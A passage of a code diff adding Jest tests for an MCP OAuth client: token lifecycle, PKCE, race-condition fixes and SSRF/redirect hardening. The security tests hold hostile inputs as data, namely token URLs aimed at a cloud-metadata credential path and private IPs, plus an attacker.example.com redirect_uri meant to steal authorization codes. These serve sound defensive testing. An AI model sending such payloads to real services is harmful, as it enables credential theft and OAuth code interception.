redirect_uris: ['http://localhost/callback'],
}),
});
expect(res.status).toBe(200);
const client = (await res.json()) as {
client_id: string;
client_secret: string;
redirect_uris: string[];
};
expect(client.client_id).toBeDefined();
expect(client.client_secret).toBeDefined();
expect(client.redirect_uris).toEqual(['http://localhost/callback']);
expect(server.registeredClients.has(client.client_id)).toBe(true);
});
});
describe('End-to-End: store, retrieve, expire, refresh cycle', () => {
it('should perform full token lifecycle with real server', async () => {
const server = await createOAuthMCPServer({
tokenTTLMs: 1000,
issueRefreshTokens: true,
});
const tokenStore = new InMemoryTokenStore();
try {
// 1. Get initial tokens via auth code exchange
const code = await server.getAuthCode();
const tokenRes = await fetch(`${server.url}token`, {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: `grant_type=authorization_code&code=${code}`,
});
const initial = (await tokenRes.json()) as {
access_token: string;
token_type: string;
expires_in: number;
refresh_token: string;
};
// 2. Store tokens
await MCPTokenStorage.storeTokens({
userId: 'u1',
serverName: 'test-srv',
tokens: initial,
createToken: tokenStore.createToken,
});
// 3. Retrieve — should succeed
const valid = await MCPTokenStorage.getTokens({
userId: 'u1',
serverName: 'test-srv',
findToken: tokenStore.findToken,
});
expect(valid).not.toBeNull();
expect(valid!.access_token).toBe(initial.access_token);
expect(valid!.refresh_token).toBe(initial.refresh_token);
// 4. Wait for expiry
await new Promise((r) => setTimeout(r, 1200));
// 5. Retrieve again — should trigger refresh via callback
const refreshCallback = async (refreshToken: string): Promise<MCPOAuthTokens> => {
const refreshRes = await fetch(`${server.url}token`, {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
},
body: `grant_type=refresh_token&refresh_token=${refreshToken}`,
});
if (!refreshRes.ok) {
throw new Error(`Refresh failed: ${refreshRes.status}`);
}
const data = (await refreshRes.json()) as {
access_token: string;
token_type: string;
expires_in: number;
refresh_token?: string;
};
return {
...data,
obtained_at: Date.now(),
expires_at: Date.now() + data.expires_in * 1000,
};
};
const refreshed = await MCPTokenStorage.getTokens({
userId: 'u1',
serverName: 'test-srv',
findToken: tokenStore.findToken,
createToken: tokenStore.createToken,
updateToken: tokenStore.updateToken,
refreshTokens: refreshCallback,
});
expect(refreshed).not.toBeNull();
expect(refreshed!.access_token).not.toBe(initial.access_token);
// 6. Verify the refreshed token works against the server
const mcpRes = await fetch(server.url, {
method: 'POST',
headers: {
'Content-Type': 'application/json',
Accept: 'application/json, text/event-stream',
Authorization: `Bearer ${refreshed!.access_token}`,
},
body: JSON.stringify({
jsonrpc: '2.0',
method: 'initialize',
id: 1,
params: {
protocolVersion: '2025-03-26',
capabilities: {},
clientInfo: { name: 'test', version: '0.0.1' },
},
}),
});
expect(mcpRes.status).toBe(200);
} finally {
await server.close();
}
});
});
describe('completeOAuthFlow via FlowStateManager', () => {
let server: OAuthTestServer;
beforeEach(async () => {
server = await createOAuthMCPServer({ issueRefreshTokens: true });
});
afterEach(async () => {
await server.close();
});
it('should exchange auth code and complete flow in FlowStateManager', async () => {
const store = new MockKeyv<MCPOAuthTokens | null>();
const flowManager = new FlowStateManager(store as unknown as Keyv, {
ttl: 30000,
ci: true,
});
const flowId = 'test-user:test-server';
const code = await server.getAuthCode();
// Initialize the flow with metadata the handler needs
await flowManager.initFlow(flowId, 'mcp_oauth', {
serverUrl: server.url,
clientInfo: {
client_id: 'test-client',
redirect_uris: ['http://localhost/callback'],
},
codeVerifier: 'test-verifier',
metadata: {
token_endpoint: `${server.url}token`,
token_endpoint_auth_methods_supported: ['client_secret_post'],
},
});
// The SDK's exchangeAuthorization wants full OAuth metadata,
// so we'll test the token exchange directly instead of going through
// completeOAuthFlow (which requires full SDK-compatible metadata)
const tokenRes = await fetch(`${server.url}token`, {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: `grant_type=authorization_code&code=${code}`,
});
const tokens = (await tokenRes.json()) as {
access_token: string;
token_type: string;
expires_in: number;
refresh_token?: string;
};
const mcpTokens: MCPOAuthTokens = {
...tokens,
obtained_at: Date.now(),
expires_at: Date.now() + tokens.expires_in * 1000,
};
// Complete the flow
const completed = await flowManager.completeFlow(flowId, 'mcp_oauth', mcpTokens);
expect(completed).toBe(true);
const state = await flowManager.getFlowState(flowId, 'mcp_oauth');
expect(state?.status).toBe('COMPLETED');
expect(state?.result?.access_token).toBe(tokens.access_token);
});
it('should fail flow when authorization code is invalid', async () => {
const tokenRes = await fetch(`${server.url}token`, {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: 'grant_type=authorization_code&code=invalid-code',
});
expect(tokenRes.status).toBe(400);
const body = (await tokenRes.json()) as { error: string };
expect(body.error).toBe('invalid_grant');
});
it('should fail when authorization code is reused', async () => {
const code = await server.getAuthCode();
// First exchange succeeds
const firstRes = await fetch(`${server.url}token`, {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: `grant_type=authorization_code&code=${code}`,
});
expect(firstRes.status).toBe(200);
// Second exchange fails
const secondRes = await fetch(`${server.url}token`, {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: `grant_type=authorization_code&code=${code}`,
});
expect(secondRes.status).toBe(400);
const body = (await secondRes.json()) as { error: string };
expect(body.error).toBe('invalid_grant');
});
});
describe('PKCE verification', () => {
let server: OAuthTestServer;
beforeEach(async () => {
server = await createOAuthMCPServer({ tokenTTLMs: 60000 });
});
afterEach(async () => {
await server.close();
});
function generatePKCE(): { verifier: string; challenge: string } {
const verifier = 'dBjftJeZ4CVP-mB92K27uhbUJU1p1r_wW1gFWFOEjXk';
const challenge = createHash('sha256').update(verifier).digest('base64url');
return { verifier, challenge };
}
it('should accept valid code_verifier matching code_challenge', async () => {
const { verifier, challenge } = generatePKCE();
const authRes = await fetch(
`${server.url}authorize?redirect_uri=http://localhost&state=test&code_challenge=${challenge}&code_challenge_method=S256`,
{ redirect: 'manual' },
);
const location = authRes.headers.get('location') ?? '';
const code = new URL(location).searchParams.get('code') ?? '';
const tokenRes = await fetch(`${server.url}token`, {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: `grant_type=authorization_code&code=${code}&code_verifier=${verifier}`,
});
expect(tokenRes.status).toBe(200);
const data = (await tokenRes.json()) as { access_token: string };
expect(data.access_token).toBeDefined();
});
it('should reject wrong code_verifier', async () => {
const { challenge } = generatePKCE();
const authRes = await fetch(
`${server.url}authorize?redirect_uri=http://localhost&state=test&code_challenge=${challenge}&code_challenge_method=S256`,
{ redirect: 'manual' },
);
const location = authRes.headers.get('location') ?? '';
const code = new URL(location).searchParams.get('code') ?? '';
const tokenRes = await fetch(`${server.url}token`, {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: `grant_type=authorization_code&code=${code}&code_verifier=wrong-verifier`,
});
expect(tokenRes.status).toBe(400);
const body = (await tokenRes.json()) as { error: string };
expect(body.error).toBe('invalid_grant');
});
it('should reject missing code_verifier when code_challenge was provided', async () => {
const { challenge } = generatePKCE();
const authRes = await fetch(
`${server.url}authorize?redirect_uri=http://localhost&state=test&code_challenge=${challenge}&code_challenge_method=S256`,
{ redirect: 'manual' },
);
const location = authRes.headers.get('location') ?? '';
const code = new URL(location).searchParams.get('code') ?? '';
const tokenRes = await fetch(`${server.url}token`, {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: `grant_type=authorization_code&code=${code}`,
});
expect(tokenRes.status).toBe(400);
const body = (await tokenRes.json()) as { error: string };
expect(body.error).toBe('invalid_grant');
});
it('should still accept codes without PKCE when no code_challenge was provided', async () => {
const code = await server.getAuthCode();
const tokenRes = await fetch(`${server.url}token`, {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: `grant_type=authorization_code&code=${code}`,
});
expect(tokenRes.status).toBe(200);
});
});
});

View file

@ -0,0 +1,516 @@
/**
* Tests for MCP OAuth race condition fixes:
*
* 1. Connection mutex coalesces concurrent getUserConnection() calls
* 2. PENDING OAuth flows are reused, not deleted
* 3. No-refresh-token expiry throws ReauthenticationRequiredError
* 4. completeFlow recovers when flow state was deleted by a race
* 5. monitorFlow retries once when flow state disappears mid-poll
*/
import { Keyv } from 'keyv';
import { logger } from '@librechat/data-schemas';
import type { OAuthTestServer } from './helpers/oauthTestServer';
import type { MCPOAuthTokens } from '~/mcp/oauth';
import { MCPTokenStorage, MCPOAuthHandler, ReauthenticationRequiredError } from '~/mcp/oauth';
import { MockKeyv, createOAuthMCPServer } from './helpers/oauthTestServer';
import { FlowStateManager } from '~/flow/manager';
jest.mock('@librechat/data-schemas', () => ({
logger: {
info: jest.fn(),
warn: jest.fn(),
error: jest.fn(),
debug: jest.fn(),
},
encryptV2: jest.fn(async (val: string) => `enc:${val}`),
decryptV2: jest.fn(async (val: string) => val.replace(/^enc:/, '')),
}));
jest.mock('~/auth', () => ({
createSSRFSafeUndiciConnect: jest.fn(() => undefined),
resolveHostnameSSRF: jest.fn(async () => false),
}));
jest.mock('~/mcp/mcpConfig', () => ({
mcpConfig: { CONNECTION_CHECK_TTL: 0, USER_CONNECTION_IDLE_TIMEOUT: 30 * 60 * 1000 },
}));
const mockLogger = logger as jest.Mocked<typeof logger>;
describe('MCP OAuth Race Condition Fixes', () => {
afterEach(() => {
jest.clearAllMocks();
});
describe('Fix 1: Connection mutex coalesces concurrent attempts', () => {
it('should return the same pending promise for concurrent getUserConnection calls', async () => {
const { UserConnectionManager } = await import('~/mcp/UserConnectionManager');
class TestManager extends UserConnectionManager {
public createCallCount = 0;
getPendingConnections() {
return this.pendingConnections;
}
}
const manager = new TestManager();
const mockConnection = {
isConnected: jest.fn().mockResolvedValue(true),
disconnect: jest.fn().mockResolvedValue(undefined),
isStale: jest.fn().mockReturnValue(false),
};
const mockAppConnections = { has: jest.fn().mockResolvedValue(false) };
manager.appConnections = mockAppConnections as never;
const mockConfig = {
type: 'streamable-http',
url: 'http://localhost:9999/',
updatedAt: undefined,
dbId: undefined,
};
jest
.spyOn(
// eslint-disable-next-line @typescript-eslint/no-require-imports
require('~/mcp/registry/MCPServersRegistry').MCPServersRegistry,
'getInstance',
)
.mockReturnValue({
getServerConfig: jest.fn().mockResolvedValue(mockConfig),
shouldEnableSSRFProtection: jest.fn().mockReturnValue(false),
});
const { MCPConnectionFactory } = await import('~/mcp/MCPConnectionFactory');
const createSpy = jest.spyOn(MCPConnectionFactory, 'create').mockImplementation(async () => {
manager.createCallCount++;
await new Promise((r) => setTimeout(r, 100));
return mockConnection as never;
});
const store = new MockKeyv();
const flowManager = new FlowStateManager(store as unknown as Keyv, { ttl: 30000, ci: true });
const user = { id: 'user-1' };
const opts = {
serverName: 'test-server',
user: user as never,
flowManager: flowManager as never,
};
const [conn1, conn2, conn3] = await Promise.all([
manager.getUserConnection(opts),
manager.getUserConnection(opts),
manager.getUserConnection(opts),
]);
expect(conn1).toBe(conn2);
expect(conn2).toBe(conn3);
expect(createSpy).toHaveBeenCalledTimes(1);
expect(manager.createCallCount).toBe(1);
createSpy.mockRestore();
});
it('should not coalesce when forceNew is true', async () => {
const { UserConnectionManager } = await import('~/mcp/UserConnectionManager');
class TestManager extends UserConnectionManager {}
const manager = new TestManager();
let callCount = 0;
const makeConnection = () => ({
isConnected: jest.fn().mockResolvedValue(true),
disconnect: jest.fn().mockResolvedValue(undefined),
isStale: jest.fn().mockReturnValue(false),
});
const mockAppConnections = { has: jest.fn().mockResolvedValue(false) };
manager.appConnections = mockAppConnections as never;
const mockConfig = {
type: 'streamable-http',
url: 'http://localhost:9999/',
updatedAt: undefined,
dbId: undefined,
};
jest
.spyOn(
// eslint-disable-next-line @typescript-eslint/no-require-imports
require('~/mcp/registry/MCPServersRegistry').MCPServersRegistry,
'getInstance',
)
.mockReturnValue({
getServerConfig: jest.fn().mockResolvedValue(mockConfig),
shouldEnableSSRFProtection: jest.fn().mockReturnValue(false),
});
const { MCPConnectionFactory } = await import('~/mcp/MCPConnectionFactory');
jest.spyOn(MCPConnectionFactory, 'create').mockImplementation(async () => {
callCount++;
await new Promise((r) => setTimeout(r, 50));
return makeConnection() as never;
});
const store = new MockKeyv();
const flowManager = new FlowStateManager(store as unknown as Keyv, { ttl: 30000, ci: true });
const user = { id: 'user-2' };
const [conn1, conn2] = await Promise.all([
manager.getUserConnection({
serverName: 'test-server',
forceNew: true,
user: user as never,
flowManager: flowManager as never,
}),
manager.getUserConnection({
serverName: 'test-server',
forceNew: true,
user: user as never,
flowManager: flowManager as never,
}),
]);
expect(callCount).toBe(2);
expect(conn1).not.toBe(conn2);
});
});
describe('Fix 2: PENDING flow is reused, not deleted', () => {
it('should join an existing PENDING flow via createFlow instead of deleting it', async () => {
const store = new MockKeyv();
const flowManager = new FlowStateManager(store as unknown as Keyv, { ttl: 30000, ci: true });
const flowId = 'test-flow-pending';
await flowManager.initFlow(flowId, 'mcp_oauth', {
clientInfo: { client_id: 'test-client' },
});
const state = await flowManager.getFlowState(flowId, 'mcp_oauth');
expect(state?.status).toBe('PENDING');
const deleteSpy = jest.spyOn(flowManager, 'deleteFlow');
const monitorPromise = flowManager.createFlow(flowId, 'mcp_oauth', {});
await new Promise((r) => setTimeout(r, 500));
await flowManager.completeFlow(flowId, 'mcp_oauth', {
access_token: 'test-token',
token_type: 'Bearer',
} as never);
const result = await monitorPromise;
expect(result).toEqual(
expect.objectContaining({ access_token: 'test-token', token_type: 'Bearer' }),
);
expect(deleteSpy).not.toHaveBeenCalled();
deleteSpy.mockRestore();
});
it('should delete and recreate FAILED flows', async () => {
const store = new MockKeyv();
const flowManager = new FlowStateManager(store as unknown as Keyv, { ttl: 30000, ci: true });
const flowId = 'test-flow-failed';
await flowManager.initFlow(flowId, 'mcp_oauth', {});
await flowManager.failFlow(flowId, 'mcp_oauth', 'previous error');
const state = await flowManager.getFlowState(flowId, 'mcp_oauth');
expect(state?.status).toBe('FAILED');
await flowManager.deleteFlow(flowId, 'mcp_oauth');
const afterDelete = await flowManager.getFlowState(flowId, 'mcp_oauth');
expect(afterDelete).toBeUndefined();
});
});
describe('Fix 3: completeFlow handles deleted state gracefully', () => {
it('should return false when state was deleted by race', async () => {
const store = new MockKeyv();
const flowManager = new FlowStateManager(store as unknown as Keyv, { ttl: 30000, ci: true });
const flowId = 'race-deleted-flow';
await flowManager.initFlow(flowId, 'mcp_oauth', {});
await flowManager.deleteFlow(flowId, 'mcp_oauth');
const stateBeforeComplete = await flowManager.getFlowState(flowId, 'mcp_oauth');
expect(stateBeforeComplete).toBeUndefined();
const result = await flowManager.completeFlow(flowId, 'mcp_oauth', {
access_token: 'recovered-token',
token_type: 'Bearer',
} as never);
expect(result).toBe(false);
const stateAfterComplete = await flowManager.getFlowState(flowId, 'mcp_oauth');
expect(stateAfterComplete).toBeUndefined();
expect(mockLogger.warn).toHaveBeenCalledWith(
expect.stringContaining('cannot recover metadata'),
expect.any(Object),
);
});
it('should reject monitorFlow when state is deleted and not recoverable', async () => {
const store = new MockKeyv();
const flowManager = new FlowStateManager(store as unknown as Keyv, { ttl: 30000, ci: true });
const flowId = 'monitor-retry-flow';
await flowManager.initFlow(flowId, 'mcp_oauth', {});
const monitorPromise = flowManager.createFlow(flowId, 'mcp_oauth', {});
await new Promise((r) => setTimeout(r, 500));
await flowManager.deleteFlow(flowId, 'mcp_oauth');
await expect(monitorPromise).rejects.toThrow('Flow state not found');
});
});
describe('State mapping cleanup on flow replacement', () => {
it('should delete old state mapping when a flow is replaced', async () => {
const store = new MockKeyv();
const flowManager = new FlowStateManager<MCPOAuthTokens | null>(store as unknown as Keyv, {
ttl: 30000,
ci: true,
});
const flowId = 'user1:test-server';
const oldState = 'old-random-state-abc123';
const newState = 'new-random-state-xyz789';
// Simulate initial flow with state mapping
await flowManager.initFlow(flowId, 'mcp_oauth', { state: oldState });
await MCPOAuthHandler.storeStateMapping(oldState, flowId, flowManager);
// Old state should resolve
const resolvedBefore = await MCPOAuthHandler.resolveStateToFlowId(oldState, flowManager);
expect(resolvedBefore).toBe(flowId);
// Replace the flow: delete old, create new, clean up old state mapping
await flowManager.deleteFlow(flowId, 'mcp_oauth');
await MCPOAuthHandler.deleteStateMapping(oldState, flowManager);
await flowManager.initFlow(flowId, 'mcp_oauth', { state: newState });
await MCPOAuthHandler.storeStateMapping(newState, flowId, flowManager);
// Old state should no longer resolve
const resolvedOld = await MCPOAuthHandler.resolveStateToFlowId(oldState, flowManager);
expect(resolvedOld).toBeNull();
// New state should resolve
const resolvedNew = await MCPOAuthHandler.resolveStateToFlowId(newState, flowManager);
expect(resolvedNew).toBe(flowId);
});
});
describe('Fix 4: ReauthenticationRequiredError for no-refresh-token', () => {
it('should throw ReauthenticationRequiredError when access token expired and no refresh token', async () => {
const expiredDate = new Date(Date.now() - 60000);
const findToken = jest.fn().mockImplementation(async (filter: { type?: string }) => {
if (filter.type === 'mcp_oauth') {
return {
token: 'enc:expired-access-token',
expiresAt: expiredDate,
createdAt: new Date(Date.now() - 120000),
};
}
if (filter.type === 'mcp_oauth_refresh') {
return null;
}
return null;
});
await expect(
MCPTokenStorage.getTokens({
userId: 'user-1',
serverName: 'test-server',
findToken,
}),
).rejects.toThrow(ReauthenticationRequiredError);
await expect(
MCPTokenStorage.getTokens({
userId: 'user-1',
serverName: 'test-server',
findToken,
}),
).rejects.toThrow('Re-authentication required');
});
it('should throw ReauthenticationRequiredError when access token is missing and no refresh token', async () => {
const findToken = jest.fn().mockResolvedValue(null);
await expect(
MCPTokenStorage.getTokens({
userId: 'user-1',
serverName: 'test-server',
findToken,
}),
).rejects.toThrow(ReauthenticationRequiredError);
});
it('should not throw when access token is valid', async () => {
const futureDate = new Date(Date.now() + 3600000);
const findToken = jest.fn().mockImplementation(async (filter: { type?: string }) => {
if (filter.type === 'mcp_oauth') {
return {
token: 'enc:valid-access-token',
expiresAt: futureDate,
createdAt: new Date(),
};
}
if (filter.type === 'mcp_oauth_refresh') {
return null;
}
return null;
});
const result = await MCPTokenStorage.getTokens({
userId: 'user-1',
serverName: 'test-server',
findToken,
});
expect(result).not.toBeNull();
expect(result?.access_token).toBe('valid-access-token');
});
});
describe('E2E: OAuth-gated MCP server with no refresh tokens', () => {
let server: OAuthTestServer;
beforeEach(async () => {
server = await createOAuthMCPServer({ tokenTTLMs: 60000 });
});
afterEach(async () => {
await server.close();
});
it('should start OAuth-gated MCP server that validates Bearer tokens', async () => {
const res = await fetch(server.url, {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ jsonrpc: '2.0', method: 'initialize', id: 1 }),
});
expect(res.status).toBe(401);
const body = (await res.json()) as { error: string };
expect(body.error).toBe('invalid_token');
});
it('should issue tokens via authorization code exchange with no refresh token', async () => {
const authRes = await fetch(`${server.url}authorize?redirect_uri=http://localhost&state=s1`, {
redirect: 'manual',
});
expect(authRes.status).toBe(302);
const location = authRes.headers.get('location') ?? '';
const code = new URL(location).searchParams.get('code');
expect(code).toBeTruthy();
const tokenRes = await fetch(`${server.url}token`, {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: `grant_type=authorization_code&code=${code}`,
});
expect(tokenRes.status).toBe(200);
const tokenBody = (await tokenRes.json()) as {
access_token: string;
token_type: string;
refresh_token?: string;
};
expect(tokenBody.access_token).toBeTruthy();
expect(tokenBody.token_type).toBe('Bearer');
expect(tokenBody.refresh_token).toBeUndefined();
});
it('should allow MCP requests with valid Bearer token', async () => {
const authRes = await fetch(`${server.url}authorize?redirect_uri=http://localhost&state=s1`, {
redirect: 'manual',
});
const location = authRes.headers.get('location') ?? '';
const code = new URL(location).searchParams.get('code');
const tokenRes = await fetch(`${server.url}token`, {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: `grant_type=authorization_code&code=${code}`,
});
const { access_token } = (await tokenRes.json()) as { access_token: string };
const mcpRes = await fetch(server.url, {
method: 'POST',
headers: {
'Content-Type': 'application/json',
Accept: 'application/json, text/event-stream',
Authorization: `Bearer ${access_token}`,
},
body: JSON.stringify({
jsonrpc: '2.0',
method: 'initialize',
id: 1,
params: {
protocolVersion: '2025-03-26',
capabilities: {},
clientInfo: { name: 'test', version: '0.0.1' },
},
}),
});
expect(mcpRes.status).toBe(200);
});
it('should reject expired tokens with 401', async () => {
const shortTTLServer = await createOAuthMCPServer({ tokenTTLMs: 500 });
try {
const authRes = await fetch(
`${shortTTLServer.url}authorize?redirect_uri=http://localhost&state=s1`,
{ redirect: 'manual' },
);
const location = authRes.headers.get('location') ?? '';
const code = new URL(location).searchParams.get('code');
const tokenRes = await fetch(`${shortTTLServer.url}token`, {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: `grant_type=authorization_code&code=${code}`,
});
const { access_token } = (await tokenRes.json()) as { access_token: string };
await new Promise((r) => setTimeout(r, 600));
const mcpRes = await fetch(shortTTLServer.url, {
method: 'POST',
headers: {
'Content-Type': 'application/json',
Authorization: `Bearer ${access_token}`,
},
body: JSON.stringify({ jsonrpc: '2.0', method: 'ping', id: 2 }),
});
expect(mcpRes.status).toBe(401);
} finally {
await shortTTLServer.close();
}
});
});
});

View file

@ -0,0 +1,228 @@
/**
* Tests verifying MCP OAuth security hardening:
*
* 1. SSRF via OAuth URLs validates that the OAuth handler rejects
* token_url, authorization_url, and revocation_endpoint values
* pointing to private/internal addresses.
*
* 2. redirect_uri manipulation validates that user-supplied redirect_uri
* is ignored in favor of the server-controlled default.
*/
import * as http from 'http';
import * as net from 'net';
import { TokenExchangeMethodEnum } from 'librechat-data-provider';
import type { Socket } from 'net';
import type { OAuthTestServer } from './helpers/oauthTestServer';
import { createOAuthMCPServer } from './helpers/oauthTestServer';
import { MCPOAuthHandler } from '~/mcp/oauth';
jest.mock('@librechat/data-schemas', () => ({
logger: {
info: jest.fn(),
warn: jest.fn(),
error: jest.fn(),
debug: jest.fn(),
},
encryptV2: jest.fn(async (val: string) => `enc:${val}`),
decryptV2: jest.fn(async (val: string) => val.replace(/^enc:/, '')),
}));
/**
* Mock only the DNS-dependent resolveHostnameSSRF; keep isSSRFTarget real.
* SSRF tests use literal private IPs (127.0.0.1, 169.254.169.254, 10.0.0.1)
* which are caught by isSSRFTarget before resolveHostnameSSRF is reached.
* This avoids non-deterministic DNS lookups in test execution.
*/
jest.mock('~/auth', () => ({
...jest.requireActual('~/auth'),
resolveHostnameSSRF: jest.fn(async () => false),
}));
function getFreePort(): Promise<number> {
return new Promise((resolve, reject) => {
const srv = net.createServer();
srv.listen(0, '127.0.0.1', () => {
const addr = srv.address() as net.AddressInfo;
srv.close((err) => (err ? reject(err) : resolve(addr.port)));
});
});
}
function trackSockets(httpServer: http.Server): () => Promise<void> {
const sockets = new Set<Socket>();
httpServer.on('connection', (socket: Socket) => {
sockets.add(socket);
socket.once('close', () => sockets.delete(socket));
});
return () =>
new Promise<void>((resolve) => {
for (const socket of sockets) {
socket.destroy();
}
sockets.clear();
httpServer.close(() => resolve());
});
}
describe('MCP OAuth SSRF protection', () => {
let oauthServer: OAuthTestServer;
let ssrfTargetServer: http.Server;
let ssrfTargetPort: number;
let ssrfRequestReceived: boolean;
let destroySSRFSockets: () => Promise<void>;
beforeEach(async () => {
ssrfRequestReceived = false;
oauthServer = await createOAuthMCPServer({
tokenTTLMs: 60000,
issueRefreshTokens: true,
});
ssrfTargetPort = await getFreePort();
ssrfTargetServer = http.createServer((_req, res) => {
ssrfRequestReceived = true;
res.writeHead(200, { 'Content-Type': 'application/json' });
res.end(
JSON.stringify({
access_token: 'ssrf-token',
token_type: 'Bearer',
expires_in: 3600,
}),
);
});
destroySSRFSockets = trackSockets(ssrfTargetServer);
await new Promise<void>((resolve) =>
ssrfTargetServer.listen(ssrfTargetPort, '127.0.0.1', resolve),
);
});
afterEach(async () => {
try {
await oauthServer.close();
} finally {
await destroySSRFSockets();
}
});
it('should reject token_url pointing to a private IP (refreshOAuthTokens)', async () => {
const code = await oauthServer.getAuthCode();
const tokenRes = await fetch(`${oauthServer.url}token`, {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: `grant_type=authorization_code&code=${code}`,
});
const initial = (await tokenRes.json()) as {
access_token: string;
refresh_token: string;
};
const regRes = await fetch(`${oauthServer.url}register`, {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ redirect_uris: ['http://localhost/callback'] }),
});
const clientInfo = (await regRes.json()) as {
client_id: string;
client_secret: string;
};
const ssrfTokenUrl = `http://127.0.0.1:${ssrfTargetPort}/latest/meta-data/iam/security-credentials/`;
await expect(
MCPOAuthHandler.refreshOAuthTokens(
initial.refresh_token,
{
serverName: 'ssrf-test-server',
serverUrl: oauthServer.url,
clientInfo: {
...clientInfo,
redirect_uris: ['http://localhost/callback'],
},
},
{},
{
token_url: ssrfTokenUrl,
client_id: clientInfo.client_id,
client_secret: clientInfo.client_secret,
token_exchange_method: TokenExchangeMethodEnum.DefaultPost,
},
),
).rejects.toThrow(/targets a blocked address/);
expect(ssrfRequestReceived).toBe(false);
});
it('should reject private authorization_url in initiateOAuthFlow', async () => {
await expect(
MCPOAuthHandler.initiateOAuthFlow(
'test-server',
'https://mcp.example.com/',
'user-1',
{},
{
authorization_url: 'http://169.254.169.254/authorize',
token_url: 'https://auth.example.com/token',
client_id: 'client',
client_secret: 'secret',
},
),
).rejects.toThrow(/targets a blocked address/);
});
it('should reject private token_url in initiateOAuthFlow', async () => {
await expect(
MCPOAuthHandler.initiateOAuthFlow(
'test-server',
'https://mcp.example.com/',
'user-1',
{},
{
authorization_url: 'https://auth.example.com/authorize',
token_url: `http://127.0.0.1:${ssrfTargetPort}/token`,
client_id: 'client',
client_secret: 'secret',
},
),
).rejects.toThrow(/targets a blocked address/);
expect(ssrfRequestReceived).toBe(false);
});
it('should reject private revocationEndpoint in revokeOAuthToken', async () => {
await expect(
MCPOAuthHandler.revokeOAuthToken('test-server', 'some-token', 'access', {
serverUrl: 'https://mcp.example.com/',
clientId: 'client',
clientSecret: 'secret',
revocationEndpoint: 'http://10.0.0.1/revoke',
}),
).rejects.toThrow(/targets a blocked address/);
});
});
describe('MCP OAuth redirect_uri enforcement', () => {
it('should ignore attacker-supplied redirect_uri and use the server default', async () => {
const attackerRedirectUri = 'https://attacker.example.com/steal-code';
const result = await MCPOAuthHandler.initiateOAuthFlow(
'victim-server',
'https://mcp.example.com/',
'victim-user-id',
{},
{
authorization_url: 'https://auth.example.com/authorize',
token_url: 'https://auth.example.com/token',
client_id: 'attacker-client',
client_secret: 'attacker-secret',
redirect_uri: attackerRedirectUri,
},
);
const authUrl = new URL(result.authorizationUrl);
const expectedRedirectUri = `${process.env.DOMAIN_SERVER || 'http://localhost:3080'}/api/mcp/victim-server/oauth/callback`;
expect(authUrl.searchParams.get('redirect_uri')).toBe(expectedRedirectUri);
expect(authUrl.searchParams.get('redirect_uri')).not.toBe(attackerRedirectUri);
});
});

View file

@ -0,0 +1,654 @@
/**
* Tests for MCP OAuth token expiry re-authentication scenarios.
*
* Reproduces the edge case where:
* 1. Tokens are stored (access + refresh)
* 2. Access token expires
* 3. Refresh attempt fails (server rejects/revokes refresh token)
* 4. System must fall back to full OAuth re-auth via handleOAuthRequired
* 5. The CSRF cookie may be absent (chat/SSE flow), so the PENDING flow fallback is needed
*
* Also tests the happy path: access token expired but refresh succeeds.
*/
import { Keyv } from 'keyv';
import { logger } from '@librechat/data-schemas';
import { FlowStateManager, PENDING_STALE_MS } from '~/flow/manager';
import { MCPTokenStorage, ReauthenticationRequiredError } from '~/mcp/oauth';
import { MockKeyv, InMemoryTokenStore, createOAuthMCPServer } from './helpers/oauthTestServer';
import type { OAuthTestServer } from './helpers/oauthTestServer';
import type { MCPOAuthTokens } from '~/mcp/oauth';
jest.mock('@librechat/data-schemas', () => ({
logger: {
info: jest.fn(),
warn: jest.fn(),
error: jest.fn(),
debug: jest.fn(),
},
encryptV2: jest.fn(async (val: string) => `enc:${val}`),
decryptV2: jest.fn(async (val: string) => val.replace(/^enc:/, '')),
}));
describe('MCP OAuth Token Expiry Scenarios', () => {
afterEach(() => {
jest.clearAllMocks();
});
describe('Access token expired + refresh token available + refresh succeeds', () => {
let server: OAuthTestServer;
let tokenStore: InMemoryTokenStore;
beforeEach(async () => {
server = await createOAuthMCPServer({
tokenTTLMs: 500,
issueRefreshTokens: true,
});
tokenStore = new InMemoryTokenStore();
});
afterEach(async () => {
await server.close();
});
it('should refresh expired access token via real /token endpoint', async () => {
// Get initial tokens from real server
const code = await server.getAuthCode();
const tokenRes = await fetch(`${server.url}token`, {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: `grant_type=authorization_code&code=${code}`,
});
const initial = (await tokenRes.json()) as {
access_token: string;
token_type: string;
expires_in: number;
refresh_token: string;
};
// Store expired access token directly (bypassing storeTokens' expiresIn clamping)
await tokenStore.createToken({
userId: 'u1',
type: 'mcp_oauth',
identifier: 'mcp:test-srv',
token: `enc:${initial.access_token}`,
expiresIn: -1,
});
await tokenStore.createToken({
userId: 'u1',
type: 'mcp_oauth_refresh',
identifier: 'mcp:test-srv:refresh',
token: `enc:${initial.refresh_token}`,
expiresIn: 86400,
});
const refreshCallback = async (refreshToken: string): Promise<MCPOAuthTokens> => {
const res = await fetch(`${server.url}token`, {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: `grant_type=refresh_token&refresh_token=${refreshToken}`,
});
if (!res.ok) {
throw new Error(`Refresh failed: ${res.status}`);
}
const data = (await res.json()) as {
access_token: string;
token_type: string;
expires_in: number;
};
return {
...data,
obtained_at: Date.now(),
expires_at: Date.now() + data.expires_in * 1000,
};
};
